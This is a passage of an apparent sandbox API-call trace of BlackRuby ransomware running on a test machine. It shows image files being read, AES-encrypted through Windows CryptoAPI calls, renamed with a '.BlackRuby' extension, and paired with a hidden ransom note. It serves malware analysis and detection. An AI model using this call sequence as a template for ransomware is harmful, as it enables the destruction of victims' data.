lpFileInformation=0x1cb6338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb49720, ftCreationTime.dwHighDateTime=0x1d34e9a, ftLastAccessTime.dwLowDateTime=0x83013d70, ftLastAccessTime.dwHighDateTime=0x1d352d3, ftLastWriteTime.dwLowDateTime=0x83013d70, ftLastWriteTime.dwHighDateTime=0x1d352d3, nFileSizeHigh=0x0, nFileSizeLow=0x1117d)) returned 1 [0060.445] GetLastError () returned 0x12 [0060.445] SetErrorMode (uMode=0x0) returned 0x1 [0060.446] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp", lpFilePart=0x0) returned 0x27 [0060.446] GetLastError () returned 0x12 [0060.446] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp", lpFilePart=0x0) returned 0x27 [0060.446] GetLastError () returned 0x12 [0060.446] SetErrorMode (uMode=0x1) returned 0x0 [0060.446] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\1xk4mxmoq.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.446] GetLastError () returned 0x0 [0060.446] GetFileType (hFile=0x184) returned 0x1 [0060.446] SetErrorMode (uMode=0x0) returned 0x1 [0060.446] GetFileType (hFile=0x184) returned 0x1 [0060.446] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x1117d [0060.446] GetLastError () returned 0x0 [0060.446] ReadFile (in: hFile=0x184, lpBuffer=0x1cb7f70, nNumberOfBytesToRead=0x1117d, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cb7f70*, lpNumberOfBytesRead=0x18ed84*=0x1117d, lpOverlapped=0x0) returned 1 [0060.447] GetLastError () returned 0x0 [0060.447] CloseHandle (hObject=0x184) returned 1 [0060.447] GetLastError () returned 0x0 [0060.447] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp", lpFilePart=0x0) returned 0x27 [0060.447] GetLastError () returned 0x0 [0060.447] SetErrorMode (uMode=0x1) returned 0x0 [0060.447] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\1xk4mxmoq.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb49720, ftCreationTime.dwHighDateTime=0x1d34e9a, ftLastAccessTime.dwLowDateTime=0x83013d70, ftLastAccessTime.dwHighDateTime=0x1d352d3, ftLastWriteTime.dwLowDateTime=0x83013d70, ftLastWriteTime.dwHighDateTime=0x1d352d3, nFileSizeHigh=0x0, nFileSizeLow=0x1117d)) returned 1 [0060.447] GetLastError () returned 0x0 [0060.447] SetErrorMode (uMode=0x0) returned 0x1 [0060.448] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0060.448] GetLastError () returned 0x0 [0060.482] CryptImportKey (in: hProv=0x37c790, pbData=0x1b46974, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360c20) returned 1 [0060.483] GetLastError () returned 0x0 [0060.483] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.483] GetLastError () returned 0x0 [0060.488] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.488] GetLastError () returned 0x0 [0060.488] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e60) returned 1 [0060.488] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.488] GetLastError () returned 0x0 [0060.488] CryptSetKeyParam (hKey=0x360e60, dwParam=0x4, pbData=0x1b739c0*=0x1, dwFlags=0x0) returned 1 [0060.488] GetLastError () returned 0x0 [0060.488] CryptSetKeyParam (hKey=0x360e60, dwParam=0x1, pbData=0x1b7398c, dwFlags=0x0) returned 1 [0060.488] GetLastError () returned 0x0 [0060.488] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b73a08*, pdwDataLen=0x18ed74*=0x11270, dwBufLen=0x11270 | out: pbData=0x1b73a08*, pdwDataLen=0x18ed74*=0x11270) returned 1 [0060.489] GetLastError () returned 0x0 [0060.489] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b95f14*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b95f14*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.489] GetLastError () returned 0x0 [0060.489] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b95f44*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b95f44*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.489] GetLastError () returned 0x0 [0060.489] CryptDestroyKey (hKey=0x360c20) returned 1 [0060.489] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.489] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0060.489] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp", lpFilePart=0x0) returned 0x27 [0060.489] GetLastError () returned 0x0 [0060.489] SetErrorMode (uMode=0x1) returned 0x0 [0060.490] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\1xk4mxmoq.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.491] GetLastError () returned 0xb7 [0060.491] GetFileType (hFile=0x184) returned 0x1 [0060.491] SetErrorMode (uMode=0x0) returned 0x1 [0060.491] GetFileType (hFile=0x184) returned 0x1 [0060.495] CloseHandle (hObject=0x184) returned 1 [0060.495] GetLastError () returned 0xb7 [0060.495] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp", lpFilePart=0x0) returned 0x27 [0060.495] GetLastError () returned 0xb7 [0060.495] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_mEVxppoGPhoDxBWaZ4CVxIfbJkEwzgD8wkaMUOk0.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_mEVxppoGPhoDxBWaZ4CVxIfbJkEwzgD8wkaMUOk0.BlackRuby", lpFilePart=0x0) returned 0x56 [0060.495] GetLastError () returned 0xb7 [0060.495] SetErrorMode (uMode=0x1) returned 0x0 [0060.495] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\1xk4mxmoq.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb49720, ftCreationTime.dwHighDateTime=0x1d34e9a, ftLastAccessTime.dwLowDateTime=0x83013d70, ftLastAccessTime.dwHighDateTime=0x1d352d3, ftLastWriteTime.dwLowDateTime=0x2c3fe440, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x11280)) returned 1 [0060.495] GetLastError () returned 0xb7 [0060.495] SetErrorMode (uMode=0x0) returned 0x1 [0060.495] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\1XK4MXMOq.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\1xk4mxmoq.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_mEVxppoGPhoDxBWaZ4CVxIfbJkEwzgD8wkaMUOk0.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_mevxppogphodxbwaz4cvxifbjkewzgd8wkamuok0.blackruby")) returned 1 [0060.496] GetLastError () returned 0xb7 [0060.496] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.496] GetLastError () returned 0xb7 [0060.496] SetErrorMode (uMode=0x1) returned 0x0 [0060.496] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.496] GetLastError () returned 0x0 [0060.496] GetFileType (hFile=0x184) returned 0x1 [0060.496] SetErrorMode (uMode=0x0) returned 0x1 [0060.496] GetFileType (hFile=0x184) returned 0x1 [0060.497] CloseHandle (hObject=0x184) returned 1 [0060.497] GetLastError () returned 0x0 [0060.497] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.497] GetLastError () returned 0x0 [0060.497] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0060.498] GetLastError () returned 0x0 [0060.498] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg", lpFilePart=0x0) returned 0x24 [0060.498] GetLastError () returned 0x0 [0060.498] SetErrorMode (uMode=0x1) returned 0x0 [0060.498] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\4qsroc.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1bc3f38 | out: lpFileInformation=0x1bc3f38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x430a0470, ftCreationTime.dwHighDateTime=0x1d34e70, ftLastAccessTime.dwLowDateTime=0x2454cd10, ftLastAccessTime.dwHighDateTime=0x1d3591c, ftLastWriteTime.dwLowDateTime=0x2454cd10, ftLastWriteTime.dwHighDateTime=0x1d3591c, nFileSizeHigh=0x0, nFileSizeLow=0x18624)) returned 1 [0060.498] GetLastError () returned 0x0 [0060.498] SetErrorMode (uMode=0x0) returned 0x1 [0060.498] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg", lpFilePart=0x0) returned 0x24 [0060.498] GetLastError () returned 0x0 [0060.498] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg", lpFilePart=0x0) returned 0x24 [0060.498] GetLastError () returned 0x0 [0060.498] SetErrorMode (uMode=0x1) returned 0x0 [0060.498] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\4qsroc.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.498] GetLastError () returned 0x0 [0060.498] GetFileType (hFile=0x184) returned 0x1 [0060.498] SetErrorMode (uMode=0x0) returned 0x1 [0060.498] GetFileType (hFile=0x184) returned 0x1 [0060.498] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x18624 [0060.498] GetLastError () returned 0x0 [0060.499] ReadFile (in: hFile=0x184, lpBuffer=0x2ba0350, nNumberOfBytesToRead=0x18624, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2ba0350*, lpNumberOfBytesRead=0x18ed84*=0x18624, lpOverlapped=0x0) returned 1 [0060.500] GetLastError () returned 0x0 [0060.500] CloseHandle (hObject=0x184) returned 1 [0060.500] GetLastError () returned 0x0 [0060.501] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg", lpFilePart=0x0) returned 0x24 [0060.501] GetLastError () returned 0x0 [0060.501] SetErrorMode (uMode=0x1) returned 0x0 [0060.501] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\4qsroc.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x430a0470, ftCreationTime.dwHighDateTime=0x1d34e70, ftLastAccessTime.dwLowDateTime=0x2454cd10, ftLastAccessTime.dwHighDateTime=0x1d3591c, ftLastWriteTime.dwLowDateTime=0x2454cd10, ftLastWriteTime.dwHighDateTime=0x1d3591c, nFileSizeHigh=0x0, nFileSizeLow=0x18624)) returned 1 [0060.501] GetLastError () returned 0x0 [0060.501] SetErrorMode (uMode=0x0) returned 0x1 [0060.501] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0060.501] GetLastError () returned 0x0 [0060.537] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c202f4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360b60) returned 1 [0060.537] GetLastError () returned 0x0 [0060.537] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.537] GetLastError () returned 0x0 [0060.542] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.542] GetLastError () returned 0x0 [0060.542] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f20) returned 1 [0060.542] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.543] GetLastError () returned 0x0 [0060.543] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1c4d340*=0x1, dwFlags=0x0) returned 1 [0060.543] GetLastError () returned 0x0 [0060.543] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1c4d30c, dwFlags=0x0) returned 1 [0060.543] GetLastError () returned 0x0 [0060.543] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2bd10d0*, pdwDataLen=0x18ed74*=0x18720, dwBufLen=0x18720 | out: pbData=0x2bd10d0*, pdwDataLen=0x18ed74*=0x18720) returned 1 [0060.544] GetLastError () returned 0x0 [0060.544] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c4d39c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c4d39c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.544] GetLastError () returned 0x0 [0060.544] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c4d3cc*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c4d3cc*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.544] GetLastError () returned 0x0 [0060.545] CryptDestroyKey (hKey=0x360b60) returned 1 [0060.546] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.546] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0060.546] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg", lpFilePart=0x0) returned 0x24 [0060.546] GetLastError () returned 0x0 [0060.546] SetErrorMode (uMode=0x1) returned 0x0 [0060.546] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\4qsroc.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.547] GetLastError () returned 0xb7 [0060.547] GetFileType (hFile=0x184) returned 0x1 [0060.547] SetErrorMode (uMode=0x0) returned 0x1 [0060.547] GetFileType (hFile=0x184) returned 0x1 [0060.549] CloseHandle (hObject=0x184) returned 1 [0060.549] GetLastError () returned 0xb7 [0060.549] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg", lpFilePart=0x0) returned 0x24 [0060.549] GetLastError () returned 0xb7 [0060.549] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_Z6XAtsO6kKVXP6sLiKOlUE6DY0Mvq3b28AcIVRRErsnss0x.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_Z6XAtsO6kKVXP6sLiKOlUE6DY0Mvq3b28AcIVRRErsnss0x.BlackRuby", lpFilePart=0x0) returned 0x5d [0060.549] GetLastError () returned 0xb7 [0060.549] SetErrorMode (uMode=0x1) returned 0x0 [0060.549] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\4qsroc.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x430a0470, ftCreationTime.dwHighDateTime=0x1d34e70, ftLastAccessTime.dwLowDateTime=0x2454cd10, ftLastAccessTime.dwHighDateTime=0x1d3591c, ftLastWriteTime.dwLowDateTime=0x2c4969c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x18730)) returned 1 [0060.550] GetLastError () returned 0xb7 [0060.550] SetErrorMode (uMode=0x0) returned 0x1 [0060.550] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\4QsRoc.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\4qsroc.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Encrypted_Z6XAtsO6kKVXP6sLiKOlUE6DY0Mvq3b28AcIVRRErsnss0x.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\encrypted_z6xatso6kkvxp6slikolue6dy0mvq3b28acivrrersnss0x.blackruby")) returned 1 [0060.550] GetLastError () returned 0xb7 [0060.550] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0060.550] GetLastError () returned 0xb7 [0060.550] SetErrorMode (uMode=0x1) returned 0x0 [0060.550] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0060.550] GetLastError () returned 0x5 [0060.551] SetErrorMode (uMode=0x0) returned 0x1 [0060.551] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif", lpFilePart=0x0) returned 0x23 [0060.551] GetLastError () returned 0x5 [0060.551] SetErrorMode (uMode=0x1) returned 0x0 [0060.551] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif" (normalized: "c:\\users\\eebsym5\\pictures\\5if1l.gif"), fInfoLevelId=0x0, lpFileInformation=0x1c6a4b4 | out: lpFileInformation=0x1c6a4b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66a4e3d0, ftCreationTime.dwHighDateTime=0x1d349ef, ftLastAccessTime.dwLowDateTime=0xf38a6af0, ftLastAccessTime.dwHighDateTime=0x1d34b2e, ftLastWriteTime.dwLowDateTime=0xf38a6af0, ftLastWriteTime.dwHighDateTime=0x1d34b2e, nFileSizeHigh=0x0, nFileSizeLow=0x7954)) returned 1 [0060.552] GetLastError () returned 0x5 [0060.552] SetErrorMode (uMode=0x0) returned 0x1 [0060.552] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif", lpFilePart=0x0) returned 0x23 [0060.552] GetLastError () returned 0x5 [0060.552] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif", lpFilePart=0x0) returned 0x23 [0060.552] GetLastError () returned 0x5 [0060.552] SetErrorMode (uMode=0x1) returned 0x0 [0060.552] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif" (normalized: "c:\\users\\eebsym5\\pictures\\5if1l.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0060.552] GetLastError () returned 0x0 [0060.552] GetFileType (hFile=0x184) returned 0x1 [0060.552] SetErrorMode (uMode=0x0) returned 0x1 [0060.552] GetFileType (hFile=0x184) returned 0x1 [0060.552] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x7954 [0060.552] GetLastError () returned 0x0 [0060.552] ReadFile (in: hFile=0x184, lpBuffer=0x1c6c3b4, nNumberOfBytesToRead=0x7954, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c6c3b4*, lpNumberOfBytesRead=0x18ed84*=0x7954, lpOverlapped=0x0) returned 1 [0060.553] GetLastError () returned 0x0 [0060.553] CloseHandle (hObject=0x184) returned 1 [0060.553] GetLastError () returned 0x0 [0060.553] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif", lpFilePart=0x0) returned 0x23 [0060.553] GetLastError () returned 0x0 [0060.553] SetErrorMode (uMode=0x1) returned 0x0 [0060.553] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif" (normalized: "c:\\users\\eebsym5\\pictures\\5if1l.gif"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66a4e3d0, ftCreationTime.dwHighDateTime=0x1d349ef, ftLastAccessTime.dwLowDateTime=0xf38a6af0, ftLastAccessTime.dwHighDateTime=0x1d34b2e, ftLastWriteTime.dwLowDateTime=0xf38a6af0, ftLastWriteTime.dwHighDateTime=0x1d34b2e, nFileSizeHigh=0x0, nFileSizeLow=0x7954)) returned 1 [0060.553] GetLastError () returned 0x0 [0060.553] SetErrorMode (uMode=0x0) returned 0x1 [0060.564] CryptImportKey (in: hProv=0x37c818, pbData=0x1cd59e8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ee0) returned 1 [0060.564] GetLastError () returned 0x0 [0060.564] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.564] GetLastError () returned 0x0 [0060.569] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.569] GetLastError () returned 0x0 [0060.569] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360da0) returned 1 [0060.569] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0060.569] GetLastError () returned 0x0 [0060.569] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1d02a34*=0x1, dwFlags=0x0) returned 1 [0060.569] GetLastError () returned 0x0 [0060.569] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1d02a00, dwFlags=0x0) returned 1 [0060.569] GetLastError () returned 0x0 [0060.569] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d02a7c*, pdwDataLen=0x18ed74*=0x7a50, dwBufLen=0x7a50 | out: pbData=0x1d02a7c*, pdwDataLen=0x18ed74*=0x7a50) returned 1 [0060.569] GetLastError () returned 0x0 [0060.569] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d11f48*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d11f48*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0060.569] GetLastError () returned 0x0 [0060.569] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d11f78*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d11f78*, pdwDataLen=0x18ed94*=0x10) returned 1 [0060.569] GetLastError () returned 0x0 [0060.569] CryptDestroyKey (hKey=0x360ee0) returned 1 [0060.570] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.570] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0060.570] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\5IF1L.gif", lpFilePart=0x0) returned 0x23 [0060.570] GetLastError () returned 0x0 [0060.570] SetErrorMode (uMode=0x1) returned 0x0 [0060.571] GetFileType (hFile=0x184) returned 0x1 [0060.571] GetFileType (hFile=0x184) returned 0x1 [0060.572] 